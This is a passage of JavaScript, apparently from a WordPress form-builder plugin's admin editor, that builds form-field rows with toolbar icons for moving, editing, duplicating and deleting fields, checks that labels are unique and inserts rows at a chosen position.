					img_PAGEDOWN.setAttribute("src", fmc_plugin_url+"/images/page_down.png");
					img_PAGEDOWN.setAttribute("title", "Move the field to the lower  page");
					img_PAGEDOWN.style.cssText = "margin:2px;cursor:pointer";
					img_PAGEDOWN.setAttribute("onclick", 'page_down("'+i+'")');
          img_PAGEDOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"page_down")');
					img_PAGEDOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"page_down")');
					
			var td_PAGEUP = document.createElement("td");
					td_PAGEUP.setAttribute("id", "dublicate_"+i);
					td_PAGEUP.setAttribute("valign", "middle");
					td_PAGEUP.setAttribute("class", "element_toolbar");
					td_PAGEUP.appendChild(img_PAGEDOWN);
///////////////////////////////////////////////////////////////////////////////////////////////
			var in_editor = document.createElement("td");
					in_editor.setAttribute("id", i+"_element_sectionform_id_temp");
         			in_editor.setAttribute("align", 'left');
					in_editor.setAttribute("valign", "top");
					in_editor.setAttribute("colspan", "2");
					in_editor.setAttribute('class', 'toolbar_padding');
					

		if (document.getElementById("form_maker_editor_ifr") && document.getElementById('form_maker_editor').style.display == "none") {
      ifr_id = "form_maker_editor_ifr";
				ifr=getIFrameDocument(ifr_id);
				in_editor.innerHTML=ifr.body.innerHTML;
		}
		else
		{
				in_editor.innerHTML=document.getElementById('form_maker_editor').value;
		}
			
			var label = document.createElement('span');
					label.setAttribute("id", i+"_element_labelform_id_temp");
					label.innerHTML = "custom_"+i;
					label.style.cssText = 'display:none';
					
			td_EDIT.appendChild(label);
			tr.appendChild(in_editor);
			tr.appendChild(td_X);
			tr.appendChild(td_LEFT);
			tr.appendChild(td_UP);
			tr.appendChild(td_DOWN);
			tr.appendChild(td_RIGHT);
			tr.appendChild(td_EDIT);
			tr.appendChild(td_DUBLICATE);
			tr.appendChild(td_PAGEUP);
			tr.appendChild(td_PAGEDOWN);
			j=2;
			;
		}
		else
		{
			i=gen;
			gen++;
			
			var tr = document.createElement('tr');
				tr.setAttribute("id", i);
				tr.setAttribute("type", "type_editor");
				
				
			var select_ = document.getElementById('sel_el_pos');
			var option = document.createElement('option');
				option.setAttribute("id", i+"_sel_el_pos");
				option.setAttribute("value", i);
				option.innerHTML="custom_"+i;
				
			l=document.getElementById('form_id_tempform_view'+form_view).childNodes.length;
			if(document.getElementById('form_id_tempform_view'+form_view).firstChild.nodeType==3)
			{
				table=document.getElementById('form_id_tempform_view'+form_view).childNodes[l-3].childNodes[1].childNodes[1].childNodes[1];
			}
			else
			{
				table=document.getElementById('form_id_tempform_view'+form_view).childNodes[l-2].firstChild.firstChild.firstChild;
			}

			var img_X = document.createElement("img");
					img_X.setAttribute("src", fmc_plugin_url+"/images/delete_el.png");
					// img_X.setAttribute("height", "20");
					img_X.setAttribute("title", "Remove the field");
					img_X.style.cssText = "cursor:pointer; margin:2px";
					img_X.setAttribute("onclick", 'remove_row("'+i+'")');
          img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"delete_el")');
					img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"delete_el")');
					
			var td_X = document.createElement("td");
					td_X.setAttribute("id", "X_"+i);
					td_X.setAttribute("valign", "middle");
					td_X.setAttribute("align", "right");
					td_X.setAttribute("class", "element_toolbar");
					td_X.appendChild(img_X);
//image pah@
			var img_UP = document.createElement("img");
					img_UP.setAttribute("src", fmc_plugin_url+"/images/up.png");
					img_UP.setAttribute("title", "Move the field up");
//					img_UP.setAttribute("height", "17");
					img_UP.style.cssText = "cursor:pointer";
					img_UP.setAttribute("onclick", 'up_row("'+i+'")');
          img_UP.setAttribute("onmouseover", 'chnage_icons_src(this,"up")');
					img_UP.setAttribute("onmouseout", 'chnage_icons_src(this,"up")');
					
			var td_UP = document.createElement("td");
					td_UP.setAttribute("id", "up_"+i);
					td_UP.setAttribute("valign", "middle");
					td_UP.setAttribute("class", "element_toolbar");
					td_UP.appendChild(img_UP);
					
			var img_DOWN = document.createElement("img");
					img_DOWN.setAttribute("src", fmc_plugin_url+"/images/down.png");
					img_DOWN.setAttribute("title", "Move the field down");
//					img_DOWN.setAttribute("height", "17");
					img_DOWN.style.cssText = "margin:2px;cursor:pointer";
					img_DOWN.setAttribute("onclick", 'down_row("'+i+'")');
          img_DOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"down")');
					img_DOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"down")');
					
			var td_DOWN = document.createElement("td");
					td_DOWN.setAttribute("id", "down_"+i);
					td_DOWN.setAttribute("valign", "middle");
					td_DOWN.setAttribute("class", "element_toolbar");
					td_DOWN.appendChild(img_DOWN);
					
			var img_RIGHT = document.createElement("img");
					img_RIGHT.setAttribute("src", fmc_plugin_url+"/images/right.png");
					img_RIGHT.setAttribute("title", "Move the field to the right");
//					img_RIGHT.setAttribute("height", "17");
					img_RIGHT.style.cssText = "cursor:pointer";
					img_RIGHT.setAttribute("onclick", 'right_row("'+i+'")');
          img_RIGHT.setAttribute("onmouseover", 'chnage_icons_src(this,"right")');
					img_RIGHT.setAttribute("onmouseout", 'chnage_icons_src(this,"right")');
					
			var td_RIGHT = document.createElement("td");
					td_RIGHT.setAttribute("id", "right_"+i);
					td_RIGHT.setAttribute("valign", "middle");
					td_RIGHT.setAttribute("class", "element_toolbar");
					td_RIGHT.appendChild(img_RIGHT);
					
			var img_LEFT = document.createElement("img");
					img_LEFT.setAttribute("src", fmc_plugin_url+"/images/left.png");
					img_LEFT.setAttribute("title", "Move the field to the left");
//					img_LEFT.setAttribute("height", "17");
					img_LEFT.style.cssText = "margin:2px;cursor:pointer";
					img_LEFT.setAttribute("onclick", 'left_row("'+i+'")');
          img_LEFT.setAttribute("onmouseover", 'chnage_icons_src(this,"left")');
					img_LEFT.setAttribute("onmouseout", 'chnage_icons_src(this,"left")');
					
			var td_LEFT = document.createElement("td");
					td_LEFT.setAttribute("id", "left_"+i);
					td_LEFT.setAttribute("valign", "middle");
					td_LEFT.setAttribute("class", "element_toolbar");
					td_LEFT.appendChild(img_LEFT);
					
			var img_EDIT = document.createElement("img");
					img_EDIT.setAttribute("src", fmc_plugin_url+"/images/edit.png");
					img_EDIT.setAttribute("title", "Edit the field");
//					img_EDIT.setAttribute("height", "17");
					img_EDIT.style.cssText = "margin:2px;cursor:pointer";
					img_EDIT.setAttribute("onclick", 'edit("'+i+'")');
          img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
					img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
					
			var td_EDIT = document.createElement("td");
					td_EDIT.setAttribute("id", "edit_"+i);
					td_EDIT.setAttribute("valign", "middle");
					td_EDIT.setAttribute("class", "element_toolbar");
					td_EDIT.appendChild(img_EDIT);
		
			var img_DUBLICATE = document.createElement("img");
					img_DUBLICATE.setAttribute("src", fmc_plugin_url+"/images/dublicate.png");
					img_DUBLICATE.setAttribute("title", "Duplicate the field");
					img_DUBLICATE.style.cssText = "margin:2px;cursor:pointer";
					img_DUBLICATE.setAttribute("onclick", 'dublicate("'+i+'")');
          img_DUBLICATE.setAttribute("onmouseover", 'chnage_icons_src(this,"dublicate")');
					img_DUBLICATE.setAttribute("onmouseout", 'chnage_icons_src(this,"dublicate")');
					
			var td_DUBLICATE = document.createElement("td");
					td_DUBLICATE.setAttribute("id", "dublicate_"+i);
					td_DUBLICATE.setAttribute("valign", "middle");
					td_DUBLICATE.setAttribute("class", "element_toolbar");
					td_DUBLICATE.appendChild(img_DUBLICATE);
					
			var img_PAGEUP = document.createElement("img");
					img_PAGEUP.setAttribute("src", fmc_plugin_url+"/images/page_up.png");
					img_PAGEUP.setAttribute("title", "Move the field to the upper page");
					img_PAGEUP.style.cssText = "margin:2px;cursor:pointer";
					img_PAGEUP.setAttribute("onclick", 'page_up("'+i+'")');
          img_PAGEUP.setAttribute("onmouseover", 'chnage_icons_src(this,"page_up")');
					img_PAGEUP.setAttribute("onmouseout", 'chnage_icons_src(this,"page_up")');
					
			var td_PAGEDOWN = document.createElement("td");
					td_PAGEDOWN.setAttribute("id", "page_up_"+i);
					td_PAGEDOWN.setAttribute("valign", "middle");
					td_PAGEDOWN.setAttribute("class", "element_toolbar");
					td_PAGEDOWN.appendChild(img_PAGEUP);
					
			var img_PAGEDOWN = document.createElement("img");
					img_PAGEDOWN.setAttribute("src", fmc_plugin_url+"/images/page_down.png");
					img_PAGEDOWN.setAttribute("title", "Move the field to the lower  page");
					img_PAGEDOWN.style.cssText = "margin:2px;cursor:pointer";
					img_PAGEDOWN.setAttribute("onclick", 'page_down("'+i+'")');
          img_PAGEDOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"page_down")');
					img_PAGEDOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"page_down")');
					
			var td_PAGEUP = document.createElement("td");
					td_PAGEUP.setAttribute("id", "dublicate_"+i);
					td_PAGEUP.setAttribute("valign", "middle");
					td_PAGEUP.setAttribute("class", "element_toolbar");
					td_PAGEUP.appendChild(img_PAGEDOWN);
///////////////////////////////////////////////////////////////////////////////////////////////
			var in_editor = document.createElement("td");
					in_editor.setAttribute("id", i+"_element_sectionform_id_temp");
         			in_editor.setAttribute("align", 'left');
					in_editor.setAttribute("valign", "top");
					in_editor.setAttribute("colspan", "2");
					in_editor.setAttribute('class', 'toolbar_padding');
					


		if (document.getElementById("form_maker_editor_ifr") && document.getElementById('form_maker_editor').style.display == "none") {
      ifr_id = "form_maker_editor_ifr";
				ifr=getIFrameDocument(ifr_id)
				in_editor.innerHTML=ifr.body.innerHTML;
		}
		else
		{
				in_editor.innerHTML=document.getElementById('form_maker_editor').value;
		}
			
			
			
			var label = document.createElement('span');
					label.setAttribute("id", i+"_element_labelform_id_temp");
					label.innerHTML = "custom_"+i;
					label.style.cssText = 'display:none';
					
			td_EDIT.appendChild(label);
			tr.appendChild(in_editor);

			tr.appendChild(td_X);
			tr.appendChild(td_LEFT);
			tr.appendChild(td_UP);
			tr.appendChild(td_DOWN);
			tr.appendChild(td_RIGHT);
			tr.appendChild(td_EDIT);
			tr.appendChild(td_DUBLICATE);
			tr.appendChild(td_PAGEUP);
			tr.appendChild(td_PAGEDOWN);

			if(document.getElementById('pos_end').checked)
			{
				table.appendChild(tr);
			}
			if(document.getElementById('pos_begin').checked)
			{	
				table.insertBefore(tr, table.firstChild);
			}
			if(document.getElementById('pos_before').checked)
			{
				beforeTr=document.getElementById(document.getElementById('sel_el_pos').value);
				table=beforeTr.parentNode;
				beforeOption=document.getElementById(document.getElementById('sel_el_pos').value+'_sel_el_pos');
				table.insertBefore(tr, beforeTr);
				select_.insertBefore(option, beforeOption);
			}
			j=2;
			;
		
		}

	close_window();
	}


	else
	if(document.getElementById('show_table').innerHTML)
	{
		
		if(document.getElementById('editing_id').value)
			i=document.getElementById('editing_id').value;		
		else
			i=gen;
			
		type=document.getElementById("element_type").value;
		if(type=="type_hidden")
		{
			if(document.getElementById(i+'_elementform_id_temp').name=="")
			{
				alert("The name of the field is required.");
				return;
			}
		}
		
		if(type=="type_map")
		{
			if_gmap_updateMap(i);
		}
		
		if(type=="type_mark_map")
		{
			if_gmap_updateMap(i);
		}
	
		if(document.getElementById(i+'_element_labelform_id_temp').innerHTML)
		{

		if(document.getElementById('editing_id').value)
		{
			Disable();
			i=document.getElementById('editing_id').value;		
			in_lab=false;
			labels_array=new Array();
			for(w=0; w<gen;w++)
			{	
				if(w!=i)
				if(document.getElementById(w+'_element_labelform_id_temp'))
					labels_array.push(document.getElementById(w+'_element_labelform_id_temp').innerHTML);
			}			
	
			for(t=0; t<labels_array.length;t++)
			{	
			if(document.getElementById(i+'_element_labelform_id_temp').innerHTML==labels_array[t])
				{
					in_lab=true;
					break;
				}
			}
			if(in_lab)
			{
				alert('Sorry, the labels must be unique.');
				return;
			}
			else
			{
	
	
	
	
				document.getElementById('editing_id').value="";
	
				tr=document.getElementById(i);
	
				destroyChildren(tr);
				tr.setAttribute('type', type);
			var img_X = document.createElement("img");
					img_X.setAttribute("src", fmc_plugin_url+"/images/delete_el.png");
					// img_X.setAttribute("height", "20");
					img_X.setAttribute("title", "Remove the field");
					img_X.style.cssText = "cursor:pointer; margin:2px";
					img_X.setAttribute("onclick", 'remove_row("'+i+'")');
          img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"delete_el")');
					img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"delete_el")');
					
			var td_X = document.createElement("td");
					td_X.setAttribute("id", "X_"+i);
					td_X.setAttribute("valign", "middle");
					td_X.setAttribute("align", "right");
					td_X.setAttribute("class", "element_toolbar");
					td_X.appendChild(img_X);
//image pah@
			var img_UP = document.createElement("img");
					img_UP.setAttribute("src", fmc_plugin_url+"/images/up.png");
					img_UP.setAttribute("title", "Move the field up");
//					img_UP.setAttribute("height", "17");
					img_UP.style.cssText = "cursor:pointer";
					img_UP.setAttribute("onclick", 'up_row("'+i+'")');
          img_UP.setAttribute("onmouseover", 'chnage_icons_src(this,"up")');
					img_UP.setAttribute("onmouseout", 'chnage_icons_src(this,"up")');
					
			var td_UP = document.createElement("td");
					td_UP.setAttribute("id", "up_"+i);
					td_UP.setAttribute("valign", "middle");
					td_UP.setAttribute("class", "element_toolbar");
					td_UP.appendChild(img_UP);
					
			var img_DOWN = document.createElement("img");
					img_DOWN.setAttribute("src", fmc_plugin_url+"/images/down.png");
					img_DOWN.setAttribute("title", "Move the field down");
//					img_DOWN.setAttribute("height", "17");
					img_DOWN.style.cssText = "margin:2px;cursor:pointer";
					img_DOWN.setAttribute("onclick", 'down_row("'+i+'")');
          img_DOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"down")');
					img_DOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"down")');
					
			var td_DOWN = document.createElement("td");
					td_DOWN.setAttribute("id", "down_"+i);
					td_DOWN.setAttribute("valign", "middle");
					td_DOWN.setAttribute("class", "element_toolbar");
					td_DOWN.appendChild(img_DOWN);
					
			var img_RIGHT = document.createElement("img");
					img_RIGHT.setAttribute("src", fmc_plugin_url+"/images/right.png");
					img_RIGHT.setAttribute("title", "Move the field to the right");
//					img_RIGHT.setAttribute("height", "17");
					img_RIGHT.style.cssText = "cursor:pointer";
					img_RIGHT.setAttribute("onclick", 'right_row("'+i+'")');
          img_RIGHT.setAttribute("onmouseover", 'chnage_icons_src(this,"right")');
					img_RIGHT.setAttribute("onmouseout", 'chnage_icons_src(this,"right")');
					
			var td_RIGHT = document.createElement("td");
					td_RIGHT.setAttribute("id", "right_"+i);
					td_RIGHT.setAttribute("valign", "middle");
					td_RIGHT.setAttribute("class", "element_toolbar");
					td_RIGHT.appendChild(img_RIGHT);
					
			var img_LEFT = document.createElement("img");
					img_LEFT.setAttribute("src", fmc_plugin_url+"/images/left.png");
					img_LEFT.setAttribute("title", "Move the field to the left");
//					img_LEFT.setAttribute("height", "17");
					img_LEFT.style.cssText = "margin:2px;cursor:pointer";
					img_LEFT.setAttribute("onclick", 'left_row("'+i+'")');
          img_LEFT.setAttribute("onmouseover", 'chnage_icons_src(this,"left")');
					img_LEFT.setAttribute("onmouseout", 'chnage_icons_src(this,"left")');
					
			var td_LEFT = document.createElement("td");
					td_LEFT.setAttribute("id", "left_"+i);
					td_LEFT.setAttribute("valign", "middle");
					td_LEFT.setAttribute("class", "element_toolbar");
					td_LEFT.appendChild(img_LEFT);
					
			var img_EDIT = document.createElement("img");
					img_EDIT.setAttribute("src", fmc_plugin_url+"/images/edit.png");
					img_EDIT.setAttribute("title", "Edit the field");
//					img_EDIT.setAttribute("height", "17");
					img_EDIT.style.cssText = "margin:2px;cursor:pointer";
					img_EDIT.setAttribute("onclick", 'edit("'+i+'")');
          img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
					img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
					
			var td_EDIT = document.createElement("td");
					td_EDIT.setAttribute("id", "edit_"+i);
					td_EDIT.setAttribute("valign", "middle");
					td_EDIT.setAttribute("class", "element_toolbar");
					td_EDIT.appendChild(img_EDIT);
		
			var img_DUBLICATE = document.createElement("img");
					img_DUBLICATE.setAttribute("src", fmc_plugin_url+"/images/dublicate.png");
					img_DUBLICATE.setAttribute("title", "Duplicate the field");
					img_DUBLICATE.style.cssText = "margin:2px;cursor:pointer";
					img_DUBLICATE.setAttribute("onclick", 'dublicate("'+i+'")');
          img_DUBLICATE.setAttribute("onmouseover", 'chnage_icons_src(this,"dublicate")');
					img_DUBLICATE.setAttribute("onmouseout", 'chnage_icons_src(this,"dublicate")');
					
			var td_DUBLICATE = document.createElement("td");
					td_DUBLICATE.setAttribute("id", "dublicate_"+i);
					td_DUBLICATE.setAttribute("valign", "middle");
					td_DUBLICATE.setAttribute("class", "element_toolbar");
					td_DUBLICATE.appendChild(img_DUBLICATE);
					
			var img_PAGEUP = document.createElement("img");
					img_PAGEUP.setAttribute("src", fmc_plugin_url+"/images/page_up.png");
					img_PAGEUP.setAttribute("title", "Move the field to the upper page");
					img_PAGEUP.style.cssText = "margin:2px;cursor:pointer";
					img_PAGEUP.setAttribute("onclick", 'page_up("'+i+'")');
          img_PAGEUP.setAttribute("onmouseover", 'chnage_icons_src(this,"page_up")');
					img_PAGEUP.setAttribute("onmouseout", 'chnage_icons_src(this,"page_up")');
					
			var td_PAGEDOWN = document.createElement("td");
					td_PAGEDOWN.setAttribute("id", "page_up_"+i);
					td_PAGEDOWN.setAttribute("valign", "middle");
					td_PAGEDOWN.setAttribute("class", "element_toolbar");
					td_PAGEDOWN.appendChild(img_PAGEUP);
					
			var img_PAGEDOWN = document.createElement("img");
					img_PAGEDOWN.setAttribute("src", fmc_plugin_url+"/images/page_down.png");
					img_PAGEDOWN.setAttribute("title", "Move the field to the lower  page");
					img_PAGEDOWN.style.cssText = "margin:2px;cursor:pointer";
					img_PAGEDOWN.setAttribute("onclick", 'page_down("'+i+'")');
          img_PAGEDOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"page_down")');
					img_PAGEDOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"page_down")');
					
			var td_PAGEUP = document.createElement("td");
					td_PAGEUP.setAttribute("id", "dublicate_"+i);
					td_PAGEUP.setAttribute("valign", "middle");
					td_PAGEUP.setAttribute("class", "element_toolbar");
					td_PAGEUP.appendChild(img_PAGEDOWN);
	///////////////////////////////////////////////////////////////////////////////////////////////
	
	
	
				if(document.getElementById('edit_for_label_position_top'))
	
					if(document.getElementById('edit_for_label_position_top').checked)
	
					{
						var add1 = document.getElementById(i+'_label_sectionform_id_temp');
						var add2 = document.getElementById(i+'_element_sectionform_id_temp');
							add2.className +=" toolbar_padding";
							//add2.setAttribute('class', 'toolbar_padding');
						tr.appendChild(add1);
						tr.appendChild(add2);
	
					}
	
					else	
	
					{
	
						var td1 = document.createElement('td');
							td1.setAttribute("colspan", "2");
							td1.setAttribute("id", i+'_label_and_element_sectionform_id_temp');
							td1.setAttribute('class', 'toolbar_padding');
						var add = document.getElementById(i+'_elemet_tableform_id_temp');
						
							td1.appendChild(add);
							tr.appendChild(td1);
	
					}
	
				else
	
					{
						var td1 = document.createElement('td');
							td1.setAttribute("colspan", "2");
							td1.setAttribute('class', 'toolbar_padding');
							td1.setAttribute("id", i+'_label_and_element_sectionform_id_temp');
		
						var add = document.getElementById(i+'_elemet_tableform_id_temp');
		
								
		
						td1.appendChild(add);
		
						tr.appendChild(td1);
	
					}
	
	
	
				tr.appendChild(td_X);
	
				tr.appendChild(td_LEFT);
				tr.appendChild(td_UP);
	
				tr.appendChild(td_DOWN);
				tr.appendChild(td_RIGHT);
	
				tr.appendChild(td_EDIT);
				if(type!="type_captcha" && type!="type_recaptcha")
				{
					tr.appendChild(td_DUBLICATE);
				}
				else			
				{
					td_DUBLICATE.removeChild(img_DUBLICATE);
					tr.appendChild(td_DUBLICATE);
				}
				tr.appendChild(td_PAGEUP);
				tr.appendChild(td_PAGEDOWN);
	
				j=2;
	
				close_window() ;
				
			call(i,key);
			}
		}
		else
		{	
		i=gen;
		in_lab=false;
		labels_array=new Array();
		for(w=0; w<gen;w++)
		{	
			if(document.getElementById(w+'_element_labelform_id_temp'))
				labels_array.push(document.getElementById(w+'_element_labelform_id_temp').innerHTML);
		}			
		for(t=0; t<labels_array.length;t++)
		{	
		if(document.getElementById(i+'_element_labelform_id_temp').innerHTML==labels_array[t])
			{
				in_lab=true;
				break;
			}
		}
		if(in_lab)
		{
			alert('Sorry, the labels must be unique.');
			return
		}
		else
		{
			
			if(type=="type_address")
				gen=gen+6;
			else
				gen++;			
				
			l=document.getElementById('form_id_tempform_view'+form_view).childNodes.length;
			if(document.getElementById('form_id_tempform_view'+form_view).firstChild.nodeType==3)
			{
				table=document.getElementById('form_id_tempform_view'+form_view).childNodes[l-3].childNodes[1].childNodes[1].childNodes[1];
			}
			else
			{
				table=document.getElementById('form_id_tempform_view'+form_view).childNodes[l-2].firstChild.firstChild.firstChild;
			}
					
			var tr = document.createElement('tr');
				tr.setAttribute("id", i);
				tr.setAttribute("type", type);

		
			var select_ = document.getElementById('sel_el_pos');
			var option = document.createElement('option');
				option.setAttribute("id", i+"_sel_el_pos");
				option.setAttribute("value", i);
				option.innerHTML=document.getElementById(i+'_element_labelform_id_temp').innerHTML;

			var img_X = document.createElement("img");
					img_X.setAttribute("src", fmc_plugin_url+"/images/delete_el.png");
					// img_X.setAttribute("height", "20");
					img_X.setAttribute("title", "Remove the field");
					img_X.style.cssText = "cursor:pointer; margin:2px";
					img_X.setAttribute("onclick", 'remove_row("'+i+'")');
          img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"delete_el")');
					img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"delete_el")');
					
			var td_X = document.createElement("td");
					td_X.setAttribute("id", "X_"+i);
					td_X.setAttribute("valign", "middle");
					td_X.setAttribute("align", "right");
					td_X.setAttribute("class", "element_toolbar");
					td_X.appendChild(img_X);
//image pah@
			var img_UP = document.createElement("img");
					img_UP.setAttribute("src", fmc_plugin_url+"/images/up.png");
					img_UP.setAttribute("title", "Move the field up");
//					img_UP.setAttribute("height", "17");
					img_UP.style.cssText = "cursor:pointer";
					img_UP.setAttribute("onclick", 'up_row("'+i+'")');
          img_UP.setAttribute("onmouseover", 'chnage_icons_src(this,"up")');
					img_UP.setAttribute("onmouseout", 'chnage_icons_src(this,"up")');
					
			var td_UP = document.createElement("td");
					td_UP.setAttribute("id", "up_"+i);
					td_UP.setAttribute("valign", "middle");
					td_UP.setAttribute("class", "element_toolbar");
					td_UP.appendChild(img_UP);
					
			var img_DOWN = document.createElement("img");
					img_DOWN.setAttribute("src", fmc_plugin_url+"/images/down.png");
					img_DOWN.setAttribute("title", "Move the field down");
//					img_DOWN.setAttribute("height", "17");
					img_DOWN.style.cssText = "margin:2px;cursor:pointer";
					img_DOWN.setAttribute("onclick", 'down_row("'+i+'")');
          img_DOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"down")');
					img_DOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"down")');
					
			var td_DOWN = document.createElement("td");
					td_DOWN.setAttribute("id", "down_"+i);
					td_DOWN.setAttribute("valign", "middle");
					td_DOWN.setAttribute("class", "element_toolbar");
					td_DOWN.appendChild(img_DOWN);
					
			var img_RIGHT = document.createElement("img");
					img_RIGHT.setAttribute("src", fmc_plugin_url+"/images/right.png");
					img_RIGHT.setAttribute("title", "Move the field to the right");
//					img_RIGHT.setAttribute("height", "17");
					img_RIGHT.style.cssText = "cursor:pointer";
					img_RIGHT.setAttribute("onclick", 'right_row("'+i+'")');
          img_RIGHT.setAttribute("onmouseover", 'chnage_icons_src(this,"right")');
					img_RIGHT.setAttribute("onmouseout", 'chnage_icons_src(this,"right")');
					
			var td_RIGHT = document.createElement("td");
					td_RIGHT.setAttribute("id", "right_"+i);
					td_RIGHT.setAttribute("valign", "middle");
					td_RIGHT.setAttribute("class", "element_toolbar");
					td_RIGHT.appendChild(img_RIGHT);
					
			var img_LEFT = document.createElement("img");
					img_LEFT.setAttribute("src", fmc_plugin_url+"/images/left.png");
					img_LEFT.setAttribute("title", "Move the field to the left");
//					img_LEFT.setAttribute("height", "17");
					img_LEFT.style.cssText = "margin:2px;cursor:pointer";
					img_LEFT.setAttribute("onclick", 'left_row("'+i+'")');
          img_LEFT.setAttribute("onmouseover", 'chnage_icons_src(this,"left")');
					img_LEFT.setAttribute("onmouseout", 'chnage_icons_src(this,"left")');
					
			var td_LEFT = document.createElement("td");
					td_LEFT.setAttribute("id", "left_"+i);
					td_LEFT.setAttribute("valign", "middle");
					td_LEFT.setAttribute("class", "element_toolbar");
					td_LEFT.appendChild(img_LEFT);
					
			var img_EDIT = document.createElement("img");
					img_EDIT.setAttribute("src", fmc_plugin_url+"/images/edit.png");
					img_EDIT.setAttribute("title", "Edit the field");
//					img_EDIT.setAttribute("height", "17");
					img_EDIT.style.cssText = "margin:2px;cursor:pointer";
					img_EDIT.setAttribute("onclick", 'edit("'+i+'")');
          img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
					img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
					
			var td_EDIT = document.createElement("td");
					td_EDIT.setAttribute("id", "edit_"+i);
					td_EDIT.setAttribute("valign", "middle");
					td_EDIT.setAttribute("class", "element_toolbar");
					td_EDIT.appendChild(img_EDIT);
		
			var img_DUBLICATE = document.createElement("img");
					img_DUBLICATE.setAttribute("src", fmc_plugin_url+"/images/dublicate.png");
					img_DUBLICATE.setAttribute("title", "Duplicate the field");
					img_DUBLICATE.style.cssText = "margin:2px;cursor:pointer";
					img_DUBLICATE.setAttribute("onclick", 'dublicate("'+i+'")');
          img_DUBLICATE.setAttribute("onmouseover", 'chnage_icons_src(this,"dublicate")');
					img_DUBLICATE.setAttribute("onmouseout", 'chnage_icons_src(this,"dublicate")');
					
			var td_DUBLICATE = document.createElement("td");
					td_DUBLICATE.setAttribute("id", "dublicate_"+i);
					td_DUBLICATE.setAttribute("valign", "middle");
					td_DUBLICATE.setAttribute("class", "element_toolbar");
					td_DUBLICATE.appendChild(img_DUBLICATE);

			var img_PAGEUP = document.createElement("img");
					img_PAGEUP.setAttribute("src", fmc_plugin_url+"/images/page_up.png");
					img_PAGEUP.setAttribute("title", "Move the field to the upper page");
					img_PAGEUP.style.cssText = "margin:2px;cursor:pointer";
					img_PAGEUP.setAttribute("onclick", 'page_up("'+i+'")');
          img_PAGEUP.setAttribute("onmouseover", 'chnage_icons_src(this,"page_up")');
					img_PAGEUP.setAttribute("onmouseout", 'chnage_icons_src(this,"page_up")');
					
			var td_PAGEDOWN = document.createElement("td");
					td_PAGEDOWN.setAttribute("id", "page_up_"+i);
					td_PAGEDOWN.setAttribute("valign", "middle");
					td_PAGEDOWN.setAttribute("class", "element_toolbar");
					td_PAGEDOWN.appendChild(img_PAGEUP);
					
			var img_PAGEDOWN = document.createElement("img");
					img_PAGEDOWN.setAttribute("src", fmc_plugin_url+"/images/page_down.png");
					img_PAGEDOWN.setAttribute("title", "Move the field to the lower  page");
					img_PAGEDOWN.style.cssText = "margin:2px;cursor:pointer";
					img_PAGEDOWN.setAttribute("onclick", 'page_down("'+i+'")');
          img_PAGEDOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"page_down")');
					img_PAGEDOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"page_down")');
					
			var td_PAGEUP = document.createElement("td");
					td_PAGEUP.setAttribute("id", "dublicate_"+i);
					td_PAGEUP.setAttribute("valign", "middle");
					td_PAGEUP.setAttribute("class", "element_toolbar");
					td_PAGEUP.appendChild(img_PAGEDOWN);
///////////////////////////////////////////////////////////////////////////////////////////////

			
			if(document.getElementById('edit_for_label_position_top'))
				if(document.getElementById('edit_for_label_position_top').checked)
				{
					var add1 = document.getElementById(i+'_label_sectionform_id_temp');
					var add2 = document.getElementById(i+'_element_sectionform_id_temp');
							add2.className +=" toolbar_padding";
						
						tr.appendChild(add1);
						tr.appendChild(add2);
				}
				else	
				{
					
					var td1 = document.createElement('td');
						td1.setAttribute("colspan", "2");
						td1.setAttribute("id", i+'_label_and_element_sectionform_id_temp');
						td1.setAttribute('class', 'toolbar_padding');
					var add = document.getElementById(i+'_elemet_tableform_id_temp');
							
						td1.appendChild(add);
						tr.appendChild(td1);
				}
			else	
			{
				var td1 = document.createElement('td');
					td1.setAttribute("colspan", "2");
					td1.setAttribute("id", i+'_label_and_element_sectionform_id_temp');
					td1.setAttribute('class', 'toolbar_padding');
				var add = document.getElementById(i+'_elemet_tableform_id_temp');
						
					td1.appendChild(add);
					tr.appendChild(td1);
			}
			tr.appendChild(td_X);
			tr.appendChild(td_LEFT);
			tr.appendChild(td_UP);
			tr.appendChild(td_DOWN);
			tr.appendChild(td_RIGHT);
			tr.appendChild(td_EDIT);
			
			if(type!="type_captcha" && type!="type_recaptcha")
			{
				tr.appendChild(td_DUBLICATE);
			}
			else			
			{
				td_DUBLICATE.removeChild(img_DUBLICATE);
				tr.appendChild(td_DUBLICATE);
			}
			
			tr.appendChild(td_PAGEUP);
			tr.appendChild(td_PAGEDOWN);
			
			if(document.getElementById('pos_end').checked)
			{
				table.appendChild(tr);
			}
			if(document.getElementById('pos_begin').checked)
			{	
				table.insertBefore(tr, table.firstChild);
			}
			if(document.getElementById('pos_before').checked)
			{
				beforeTr=document.getElementById(document.getElementById('sel_el_pos').value);
				table=beforeTr.parentNode;
				beforeOption=document.getElementById(document.getElementById('sel_el_pos').value+'_sel_el_pos');
				table.insertBefore(tr, beforeTr);
				select_.insertBefore(option, beforeOption);
			}
			j=2;
			close_window() ;
			;
		call(i,key);
		
		}
	}	
	}
		else
		{
			alert("The field label is required.");
			return;
		}
	
/*	undo_redo.push(document.getElementById('take').innerHTML);
	undo_redo_num++;*/
